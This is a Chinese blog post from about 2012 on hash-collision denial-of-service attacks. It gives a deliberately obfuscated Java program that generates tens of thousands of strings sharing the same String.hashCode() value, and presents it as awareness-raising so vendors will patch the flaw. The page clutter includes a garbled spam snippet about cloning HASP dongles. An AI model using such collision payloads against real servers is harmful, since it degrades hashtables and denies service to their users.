Java Hash Algorithm Collision Practice (JAVA哈希算法冲突实践)

最新推荐文章于 2021-02-27 08:18:02 发布
最新推荐文章于 2021-02-27 08:18:02 发布
阅读量1k 收藏
点赞数
分类专栏: java 文章标签: java algorithm 算法 string 数据结构 dos
 

摘要

以代码形式,提供一种可验证的Java语言下哈希冲突字串生成方式。制造Hash冲突可引发Hashtable数据结构退化为低效链表,常用于DoS攻击。

背景及几句废话

2012年的第一篇blog,想想还是写点技术相关的。最近安全圈比较热的话题是hash algorithm collision dos attack. 截止到本文发布之时,比较优雅解决这一问题的厂商依然只是少数。为了促进这一问题得到尽快解决,我认为有必要在更大的范围内普及这一攻击的基础知识。本文主要思路以代码方式提供。如果不能保证独立运行以下代码,请绕道;如果对代码可读性有疑问,那是我故意的。

PS: JDK中关于hashCode()方法的实现,可用以下公式表达:

代码

package com.dcs.test4fun;

import java.math.BigDecimal;

public class HashCollision {

	 private static final int i1 = 48;
	    private static final int i2 = 8;
	    private static final int i3 = 31;
	    private static final int i4 = 60000;
	    private static final long l1 = i3 -1;
	    private static final long l2 = 2l << 32;
	    private static final BigDecimal d1 = new BigDecimal(31);
	    private static final BigDecimal d2 = d1.pow(i2);
	    private static final BigDecimal d3 = new BigDecimal(l2);
		public static void main(String[] args) {
			String t = "test_string";
			for(int i=0; i<=i4; i++) {
				String s = String.valueOf(i);
	            while(s.length() < 5){
	            	s = "0" + s;
	            }
	            int hs = s.hashCode();
	    		char[] r = g(hs, t.hashCode());
	    		s = s.concat(new String(r));
	    		if (s.hashCode() != t.hashCode()) {
	    			System.err.println("NO WAY, I Couldn't be wrong...");
	    			System.exit(1);
	    		}
	    		System.out.println(s);
			}
		}
		private static char[] g(int s, int t) {
	        long hx1 = l1 * s + i1;
	        BigDecimal hx2 = d2.multiply(new BigDecimal(hx1)).subtract(new BigDecimal(i1));
	        BigDecimal hx3 = hx2.divide(new BigDecimal(l1));
	        BigDecimal hx4 = new BigDecimal(t).subtract(hx3);
	        BigDecimal b = hx4.divideToIntegralValue(d3.multiply(d3));
	        long l = hx4.subtract(b).longValue();
	        l = (l+l2) % l2;
	        if (l < 0) l += l2;
	        char[] c = new char[i2];
	        int p = 0;
	        while (l != 0) {
	            c[p++] = (char) (l % (i3) + i1);
	            l = l / i3;
	        }
	        int f = i2 - p;
	        char[] cs = new char[i2];
	        int i = 0;
	        while (i < f) {
	            cs[i++] = (char) i1;
	        }
	        while (i < i2) {
	            cs[i] = c[p - i + f - 1];
	            ++i;
	        }
	        return cs;
	    }


}


 

滴答
关注
专栏目录
Java Hash Collision DoS Attack
03-19
Java实现的Hash Collision DoS Attack
Java Hash Collision之数据生产
weixin_34148456的博客
06-03 187
上一篇文章一种高级的DoS攻击-Hash碰撞攻击我通过伪造Hash Collision数据实现了对JavaDoS攻击,下面说说如何生产大量的攻击数据。 HashTable是一种非常常用的数据结构。它存取速度快,结构简单,深得程序员喜爱。HashTable大致数据结构如下图: Hash Function也叫哈希散列函数,通过散列函数我们能将各种类型的k...
Map中的hash()
u011381576的博客
03-13 5838
你知道HashMap中hash方法的具体实现吗?你知道HashTable、ConcurrentHashMap中hash方法的实现以及原因吗?你知道为什么要这么实现吗?你知道为什么JDK 7和JDK 8中hash方法实现的不同以及区别吗?如果你不能很好的回答这些问题,那么你需要好好看看这篇文章。文中涉及到大量代码和计算机底层原理知识。绝对的干货满满。整个互联网,把hash()分析的如此透彻的,别无二...
解决Hash碰撞冲突方法总结
热门推荐
zeb_perfect的专栏
09-18 5万+
Hash碰撞冲突 我们知道,对象Hash的前提是实现equals()和hashCode()两个方法,那么HashCode()的作用就是保证对象返回唯一hash值,但当两个对象计算值一样时,这就发生了碰撞冲突。如下将介绍如何处理冲突,当然其前提是一致性hash。 1.开放地址法 开放地执法有一个公式:Hi=(H(key)+di) MOD m i=1,2,…,k(k 其中,m为哈希表的表长。d
Hasp HL加密狗模拟、解密硬复制Hasp HL
soft3403的专栏
08-23 7664
<br />HASP HL掩护锁取利用程序之间的保险通讯通讲名现了对两头层攻打的强盛保护。轻松辨别运用软件受权用户:每一个HASP HL时光型保护锁皆有一个独一的ID号。<br />ISO认证:HASP HL维护锁依照ISO9001:2000设计出产,确保。一贯的产品品德及机能表示。Hasp系列的加密锁能够采用局部Hasp HL模拟器入言模拟。<br />首先采取软件农具得到添稀狗的信息转换后,用对应的Hasp HL模仿器装置应用,有点免狗支撑降级 毛病有加壳的软件须要脱壳后模拟,飞天加密狗。需要质大可接洽
python 密码学示例——理解哈希(Hash算法
09-24
例如,MD5(Message-Digest Algorithm 5)是一种经典的哈希算法,它能对任意大小的输入生成16字节的摘要,但由于其历史较久和摘要长度较短,现在已不再适用于安全性要求极高的场合。 二、MD5哈希算法实例 在Python...
hashcollision
07-07
莫尔斯电码哈希碰撞检测器这是什么? 这个小工具将相当于字母表中每个字母的二进制莫尔斯电码转换为一个数字。 这个数字可以用作表的索引。你为什么需要这个? 如果您正在尝试莫尔斯电码挑战,此工具会计算将二进制...
Java中常用的加密算法MD5,SHA,RSA
09-16
SHA(Secure Hash Algorithm)是一种哈希加密算法家族,它包括 SHA-1、SHA-224、SHA-256、SHA-384 和 SHA-512 等多种变体。SHA 加密算法广泛应用于数字签名、身份验证和数据完整性认证等领域。其优点是计算速度快、...
哈希摘要算法编程设计源代码
09-02
1. **MD5(Message-Digest Algorithm 5)**:早期广泛使用的哈希算法,由于其碰撞概率较高,现在主要用作教学和测试,不再适用于安全场景。 2. **SHA-1(Secure Hash Algorithm 1)**:与MD5类似,但安全性略强。...
各种hash算法-hashcodeUtil
08-11
在IT领域,哈希算法Hash Algorithm)是一种用于将任意长度的数据映射为固定长度输出的函数,这种输出通常称为哈希值。哈希算法在数据处理、信息安全、分布式系统等多个方面有着广泛应用。"hashCodeUtil"是Java编程...
JAVA HASH算法
zeng622peng的专栏
11-26 1万+
<br />/**<br />* Hash算法大全<br><br />* 推荐使用FNV1算法<br />* @algorithm None<br />* @author Goodzzp 2006-11-20<br />* @lastEdit Goodzzp 2006-11-20<br />* @editDetail Create<br />*/<br />public class HashAlgorithms<br />{<br />    /**//**<br />    * 加法hash<br /> 
hashalgorithm java_HashAlgorithm | 学步园
weixin_29006701的博客
02-27 354
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import java.util.Random;public class HashAlgorithmTest {static Random ran = new Random();/** key's count ...
Java解决hash冲突的办法
jvisualvm
03-01 571
原创转载请注明出处:http://agilestyle.iteye.com/blog/2359703   Hash冲突   解决办法 开放定址法(线性探测再散列,二次探测再散列,伪随机探测再散列) 再哈希法 链地址法 建立一个公共溢出区 Note: JavaHashMap采用的是 链地址法   Reference https://en.wikipedia.org...
关于JavaHash算法的深入理解
sinat_31011315的博客
12-03 3万+
我们眼中的哈希 在计算机领域中哈希涉及的范围非常广泛,而且是较长使用的一种算法数据结构,对此我们在后端开发中不断地使用由jdk提供的方法进行使用。由于长时间的使用,很少人会去对里面的核心进行分析和学习。HashMap是通过一个Entry的数组实现的。而Entry的结构有三个属性,key,value,next。如果在c中,我们遇到next想到的必然是指针,其实在java这就是个指针。每次通过ha
hash collision攻击的延续
java开发指南博客 【转载】
04-10 131
前段时间的hash collision导致拒绝服务的攻击,各种WEB容器都进行了修补。 GET方法因为客房端和服务端本身的实现基本可以限制URL的长度而不至于产生大量key-value。 大多数http服务器和WEB容器都是判断POST数据中参数个数,如x-www-form-urlencoded时判断&amp;的个数,multipart时判断boundary的个数,超过一定个数即认为是攻击。 但是...
Defense hash algorithm collision 防御hash算法冲突导致拒绝服务器
weixin_34050389的博客
01-01 71
问题 一篇#2011-003 multiple implementations denial-of-service via hash algorithm collision 文章,引起了 Web 应用安全领域的骚动。 这种hash算法冲突的原理到底是什么?可以看看一下两篇以PHP为例子的说明文章: PHP数组的Hash冲突实例 , Supercolliding a PHP array 关于...
加密解密(四)--Java中的Hash算法
未然的博客
05-14 2万+
Hash算法严格上来说并不属于加密算法,而是与加密算法属于并列关系的一种算法。概括来说,哈希(Hash)是将目标文本转换成具有相同长度的、不可逆的杂凑字符串(或叫做消息摘要),而加密(Encrypt)是将目标文本转换成具有不同长度的、可逆的密文。 因为Hash算法在信息的转化过程中,具体来说,两者的主要区别有以下两个: 1)Hash算法转换过程不可逆,而加密转换过程可逆 2)Hash算法无论输
Java中的Hashtable实现方法
weixin_34129696的博客
04-24 156
首先,先上Hashtable.class中的代码,所有的Java实现方法都在这个文件中了。 Hashtable.class 当然,对于这个文件的内容,你现在无需看懂它,如果你看懂了,我们下面也就没有意义讲解了。现在,来让我们回顾下,在Java中使用Hashtable中的方法:   Hashtable使用的方法 import java.util.Hashtab...
Java 哈希冲突的处理
抛弃幻想,准备斗争
04-20 1019
哈希冲突的处理:链地址法(Seperate Chaining) 哈希表: 生成的索引,可能是负整数,需要去掉符号“-”。和31个1进行按位与操作。 接着按照索引位置存储进数组: 如果再来个K3进行哈希转换成的索引还是1呢?依然放进1位置里面: 此时的k2和k3就形成了链表的形式。 查找表也可以使用平衡树结构: 例如计算一个元素的哈希值所对应的索引,接着从哈希...
Java常用哈希算法详解:加法、旋转、FNV等
"Java中的哈希(HASH算法在编程中有着广泛的应用,尤其是在数据存储、查找、哈希表等领域。本资源总结了多种经典的Java哈希算法,包括加法哈希、旋转哈希、FNV算法、RS算法哈希、PJW算法、ELF算法、BKDR算法、SDBM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值